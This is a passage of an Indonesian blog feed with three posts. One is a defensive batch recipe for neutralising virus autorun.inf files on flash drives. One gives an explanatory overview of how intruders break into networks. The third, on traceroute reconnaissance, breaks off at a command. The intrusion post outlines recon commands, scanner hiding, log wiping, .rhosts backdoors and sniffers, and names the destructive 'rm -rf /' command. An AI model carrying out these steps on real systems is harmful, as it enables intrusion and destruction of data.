&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;Tentunya teman2 semuanya sudah mengetahui bhw virus2 dapat menularkan dirinya ke komputer2 lain dengan media flashdisk. -.-“. Kesal? Sudah pasti! Saya juga merasakan perasaan yang sama ketika komputer saya juga ikut2an kena virus… tapi saya punya cara yang ampuh agar virus yang ada di flashdisk tersebut tidak dapat menularkan dirinya ke komputer lain..&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “&lt;b&gt;autorun.inf&lt;/b&gt;” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis dengan beberapa &lt;b&gt;mantra&lt;/b&gt; didalamnya, setelah itu kita tinggal mengedit mantra tersebut dengan memblock semua mantra tersebut(ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. Anda juga bisa menuliskan beberapa puisi indah tentang perdamaian didalamnya ^-^.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “&lt;b&gt;read-only&lt;/b&gt;”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? Gigi dibalas dengan gigi, mata dibalas dengan mata, dan yah… anda benar! MANTRA juga DIBALAS DENGAN MANTRA!! Mantranya sangatlah mudah… saya akan membahasnya secara bertahap sekarang juga :&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;1)buka aplikasi notepad (tempat dimana kita akan menulis mantra)&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;2)tuliskan mantra “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;3)langkah selajutnya adalah tulis mantra lagi! Mantranya “echo ‘terserah tulisan apa’ &gt;f:\autorun.inf&amp;amp;attrib +r f:\autorun.inf” (tnp tanda petik juga).&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;4)lalu save file mantra tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “&lt;b&gt;.bat&lt;/b&gt;”(harus tidak boleh tidak)&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;5)lalu jalankan file mantra yang baru kita buat tersebut&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;6)buka explorer&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter sambil mengucapkan “sim…salabim…”. Maka aplikasi notepad akan muncul lagi sambil menampilkan beberapa tulisan, tetapi yang ini jelas bukan mantra ^-^.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoPlainText" style="margin: 0cm 0cm 0.0001pt;"&gt;Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan &lt;b&gt;ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain&lt;/b&gt;… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh. Hehehe… ^-^.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/283880325471720442-4453388067992358471?l=gusriandy.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://gusriandy.blogspot.com/feeds/4453388067992358471/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=283880325471720442&amp;postID=4453388067992358471' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/4453388067992358471'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/4453388067992358471'/><link rel='alternate' type='text/html' href='http://gusriandy.blogspot.com/2007/12/membuat-flashdisk-aman-dari-autorun-nya.html' title='Membuat Flashdisk Aman Dari Autorun-Nya Si-Virus'/><author><name>Ndhy_Note Site's</name><uri>http://www.blogger.com/profile/12984169970942636271</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-283880325471720442.post-299644404847441792</id><published>2007-11-10T00:59:00.000-08:00</published><updated>2007-12-27T22:48:23.220-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Next Trick'/><title type='text'>Teknik Mengcrack</title><content type='html'>&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Andy: ^_^&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Dalam tulisan ini saya coba ketengahkan beberapa teknik yang umumnya digunakan teman-teman untuk melakukan crack ke sistem komputer. Referensi-nya bisa dibaca di&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="margin-top: 0cm; font-family: times new roman; text-align: justify;" type="disc"&gt;&lt;li class="MsoNormal"&gt;&lt;a href="http://www.rootshell.com/"&gt;http://www.rootshell.com&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;&lt;a href="http://www.antionline.com/archives/documents/advanced/"&gt;http://www.antionline.com/archives/documents/advanced/&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;&lt;a href="http://www.rootshell.com/beta/documentation.html"&gt;http://www.rootshell.com/beta/documentation.html&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;&lt;a href="http://seclab.cs.ucdavis.edu/papers.html"&gt;http://seclab.cs.ucdavis.edu/papers.html&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;&lt;a href="http://rhino9.ml.org/textware/"&gt;http://rhino9.ml.org/textware/&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="font-family: times new roman; text-align: justify;" class="MsoBodyText"&gt;Salah satu referensi menarik lainnya adalah artikel dari Front-line Information Security Team, "Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks," &lt;a href="mailto:fist@ns2.co.uk"&gt;fist@ns2.co.uk&lt;/a&gt; &amp;amp; &lt;a href="http://www.ns2.co.uk/"&gt;http://www.ns2.co.uk&lt;/a&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="font-family: times new roman; text-align: justify;" class="MsoBodyText"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="font-family: times new roman; text-align: justify;" class="MsoBodyText"&gt;Lembaga apa saja sebetulnya yang biasanya rentan terhadap serangan cracker ini? &lt;st1:city st="on"&gt;&lt;st1:place st="on"&gt;Ada&lt;/st1:place&gt;&lt;/st1:city&gt; cukup banyak sebetulnya mulai dari:&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="margin-top: 0cm; font-family: times new roman; text-align: justify;" type="disc"&gt;&lt;li class="MsoNormal"&gt;institusi finansial      &amp;amp; bank&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Internet service      provider (ISP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Perusahaan farmasi&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Lembaga pemerintah      &amp;amp; pertahanan&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Perusahaan      multinasional&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;st1:place st="on"&gt;Para&lt;/st1:place&gt; cracker ini profile-nya seperti apa? Jika kita perhatikan baik-baik maka umumnya mereka adalah pria berusia antara 16-25 tahun. Mereka umumnya melakukan cracking untuk meningkatkan kemampuan cracking mereka atau untuk menggunakan resource yang ada di jaringan untuk keperluan pribadinya. Umumnya mereka ada opportunis yang secara untung-untung menscan sistem untuk melihat lubang dari sistem. Umumnya setelah berhasil memasuki sistem yang dimaksud kemudian mengambil akses administrator (root) dari sistem tersebut; kemudian membuat akses backdoor agar dikemudian hari dapat memasuki sistem tersebut lagi sambil menutup berbagai lubang security yang ada supaya cracker lain tidak bisa memanfaatkan sistem yang dia kuasai ini.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Sebelum memasuki berbagai teknik yang dipakai oleh para cracker untuk menguasai sistem ada baiknya kita melihat secara sepintas saja metoda apa saja yang digunakan oleh berbagai perusahaan ini untuk menyambungkan ke Internet. Secara sederhana umumnya berbagai perusahaan / instansi menyambung ke Internet menggunakan teknik-teknik firewall dan proxy server untuk akses bagi anggota / karyawan / siswanya agar bisa akses bersama melalui satu saluran komunikasi. Adapun hubungan ke Internet umumnya digunakan untuk hosting webserver, servis e-mail agar bisa berhubungan dengan dunia luar dan memberikan akses ke Internet bagi perusahaan / anggota / siswa.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Dalam setup jaringan komputer yang demikian umumnya webserver bukanlah tempat yang cukup menarik untuk di serang jika kita menginginkan akses ke informasi yang ada dalam corporate network. Kalaupun seorang cracker menyerang webserver umumnya digunakan untuk mengubah file yang ada untuk menjatuhkan citra perusahaan / lembaga. Bagi cracker yang berkeinginan untuk memasuki intranet corporate maka serangan akan dilakukan ke server e-mail karena biasanya server e-mail yang mempunyai saluran secara langsung ke dalam intranet untuk bertukar e-mail antara dunia intranet dan dunia internet. Bagi cracker yang cukup canggih maka serangan akan dilakukan pada router menggunakan scanner secara agresif terhadap protokol managemen SNMP yang akhirnya bisa mengubah router yang ada menjadi jembatan mereka memasuki intranet dari internet.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Setelah mengetahui berbagai modus yang ada di atas mari kita bahas sedikit lebih detail tentang cara mereka menyerang. Teknik pertama yang perlu dilakukan oleh para cracker ini adalah teknik ‘cloak’ yang pada dasarnya menyembunyikan diri pada saar menyerang agar administrator jaringan di ujung sebelah sana tidak menyadari bahwa mesin-nya sedang di serang. Teknik ‘cloak’ yang biasanya digunakan oleh para cracker ini adalah:&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="margin-top: 0cm; font-family: times new roman; text-align: justify;" type="disc"&gt;&lt;li class="MsoNormal"&gt;Melakukan bouncing      (melompat) dari mesin yang sebelumnya telah di serang melalui program      telnet atau remote shell rsh.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melakukan bouncing      (melompat) dari mesin yang menjalankan windows melalui software wingate      mereka.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melakukan bouncing      (melompat) dari server proxy yang salah di konfigurasinya.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Seorang cracker pada saat menyerang harus mengumpulkan banyak informasi tentang jaringan yang akan dia serang. Beberapa teknik yang umumnya digunakan untuk mengumpulkan informasi tersebut biasanya dijalankan di perangkat Unix (bukan windows) yang antara lain adalah:&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="margin-top: 0cm; font-family: times new roman; text-align: justify;" type="disc"&gt;&lt;li class="MsoNormal"&gt;Menggunakan      perangkat lunak nslookup dalm memberikan perintah ‘ls &lt;domain&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/domain&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melihat file HTML      di server Web anda untuk mengidentifikasi host lain di intranet anda.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melihat berbagai      dokumen yang ada di server file (FTP) anda.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melakukan hubungan      ke server mail anda menggunakan perintah ‘telnet host 25’ dan memberikan      perintah ‘expn &lt;user&gt;’.&lt;o:p&gt;&lt;/o:p&gt;&lt;/user&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Mem-‘finger’      pengguna yang memiliki account di mesin yang terbuka di internet.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Selanjutnya adalah mengidentifikasi komponen jaringan apa saja yang di set sebagai komponen yang paling di percaya di jaringan intranet perusahaan tersebut. Biasanya mesin yang digunakan administrator atau server biasanya dipercaya sebagai mesin paling aman di jaringan.&lt;span style=""&gt;  &lt;/span&gt;Untuk melihat mesin mana yang di anggap paling aman di jaringan biasanya para cracker ini start dengan melihat men-cek daftar export dari Network File System (NFS) ke directory /usr/bin, /etc dan /home dimesin mana saja dilakukan operasi NFS tersebut. Jika bisa mengakses webserver maka bisa juga mengeksploitasi kelemahan Common Gateway Internet (CGI) untuk mengakses file /etc/hosts.allow.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Setelah melihat mesin mana yang dianggap paling aman / paling bisa dipercaya di jaringan intranet yang ingin kita serang. Langkah selanjutnya adalah mengidentifikasi kelemahan mesin-mesin tersebut. Ada beberapa program yang umumnya bersifat public domain &amp;amp; bisa secara mudah + gratisan di ambil di internet yang bisa digunakan untuk melakukan operasi tersebut, beberapa diantara program di Linux untuk keperluan tersebut adalah ADMhack, mscan, nmap &amp;amp; banyak scanner kecil. Biasanya agar administrator mesin tidak mengetahui bahwa kita melakukan scanning tersebut maka program ini di sembunyikan di balik program ‘ps’ atau ‘netstat’. Jika router di institusi / lembaga lawan tersebut ternyata mengaktifkan kemampuan agar bisa dimanage jarak jauh menggunakan protokol SNMP maka cracker yang lebih canggih bisa mengaktifkan teknik scanning SNMP yang bisa menguasai router tersebut.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Beberapa hal yang biasanya di cek pada saat melakukan scanning pada sebuah alat di jaringan komputer antara lain adalah:&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="margin-top: 0cm; font-family: times new roman; text-align: justify;" type="disc"&gt;&lt;li class="MsoNormal"&gt;Scan port TCP dari      sebuah mesin.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melihat servis RPC      yang dijalankan menggunakan portmapper.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melihat daftar      export melalui nfsd.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melihat daftar      directory yang di share melalui samba / netbios.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Melakukan banyak      finger untuk mengidentifikasi account default.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Scan kelemahan      Common Gateway Interface (CGI).&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Identifikasi      kelemagan berbagai software server yang dijaankan di mesin seperti,      sendmail, IMAP, POP3, RPC status &amp;amp; RPC mountd.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Setelah mengetahui kelemahan sistem, cracker tinggal mengambil alih sistem sistem dengan menjalankan program dari jauh untuk mengeksploit kelemahan software daemon server untuk memperoleh akses administrator / root dari mesin anda. Setelah cracker berhasil memperoleh akses ke peralatan yang lemah tadi maka cracker umumnya melakukan operasi pembersihan ‘clean up’ terhadap file log agar tidak terlihat oleh si administrator mesin tentang apa yang dilakukan oleh si cracker. Kemudian cracker akan memasang software / program yang diperlukan untuk membuat ‘backdoor’ agar dikemudian hari dapat mengakses sistem tersebut. Memasang .rhosts file di /usr/bin agar dikemudian hari dapat menjalankan program di mesin yang sudah dikuasai menggunakan perintah rsh &amp;amp; csh dari jauh saja.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;Pada titik ini sebetulnya mesin sudah dikuasai tinggal dimanfaatkan saja. Ada banyak hal yang bisa dilakukan oleh cracker dalam memanfaatkan mesin yang sudah dia kuasai, antara lain:&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="margin-top: 0cm; font-family: times new roman; text-align: justify;" type="disc"&gt;&lt;li class="MsoNormal"&gt;Menjadikan jembatan      antara Internet dengan intranet network.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Menginstalasi      sniffer untuk melihat traffic yang sedang berjalan di LAN Corporate      network di situ bisa dilihat berbagai password, nomor kartu kredit kalau      tidak dilindungi. Program cpm di &lt;a href="http://www.cert.org/ftp/tools/cpm"&gt;http://www.cert.org/ftp/tools/cpm&lt;/a&gt;      mungkin bisa membantu memperbaiki interface yang dipasangi sniffer ini.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal"&gt;Yang paling sial      kalau cracker menjalankan perintah ‘rm –rf /&amp;amp;’ karena mesin akan      hancur lebur. Anda akan membutuhkan waktu beberapa jam s/d beberapa bulan      untuk memperbaikinya kalau anda tidak pernah memback-up setting anda. Hal      ini akan sangat berbahaya jika dijalankan di mesin-mesin yang menjalankan      operasi ‘mission critical’ misalnya server di perbankan dll.&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="font-family: times new roman; text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/283880325471720442-299644404847441792?l=gusriandy.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://gusriandy.blogspot.com/feeds/299644404847441792/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=283880325471720442&amp;postID=299644404847441792' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/299644404847441792'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/299644404847441792'/><link rel='alternate' type='text/html' href='http://gusriandy.blogspot.com/2007/11/teknik-mengcrack.html' title='Teknik Mengcrack'/><author><name>Ndhy_Note Site's</name><uri>http://www.blogger.com/profile/12984169970942636271</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-283880325471720442.post-5141059392154237939</id><published>2007-11-08T20:49:00.000-08:00</published><updated>2007-12-27T22:38:21.122-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Yeah...'/><title type='text'>Teknik Mengintai Jaringan Lawan</title><content type='html'>&lt;h1 style="text-align: justify; font-style: italic;"&gt;Ndy:&lt;/h1&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:10;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Langkah ke empat (4) terakhir dalam proses footprinting adalah melakukan pengintaian jaringan lawan, dalam bahasa Inggris-nya adalah network reconnaissance. Proses pengintaian dapat dilakukan dengan menggunakan perangkat lunak traceroute (di UNIX / Linux), atau menggunakan tracert (di Windows).&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Traceroute merupakan perangkat lunak diagnostik yang pertama kali di kembangkan oleh salah satu sesepuh Internet yaitu Van Jacobson. Dengan mengakali parameter Time To Live (TTL) di paket IP agar setiap router yang dilewati mengirimkan berita ICMP_TIME_EXCEEDED, kita dapat memetakan route yang diambil oleh sebuah paket dalam jaringan Internet.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Sebagai contoh kita akan melihat hasil traceroute ke beberapa mesin yang ada di lingkungan jaringan Telkom, seperti &lt;a href="http://www.telkom.co.id/"&gt;www.telkom.co.id&lt;/a&gt;, &lt;a href="http://www.plasa.com/"&gt;www.plasa.com&lt;/a&gt;, in-mta1.telkom.co.id. Proses traceroute saya lakukan menggunakan sambungan dial-up menggunakan ISP indo.net.id pada kecepatan 19.2Kbps karena kebetulan memang kabel telepon di rumah saya tidak terlalu baik. Mari kita lihat beberapa kesimpulan dari peta yang kita peroleh.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;[root@gate onno]# traceroute 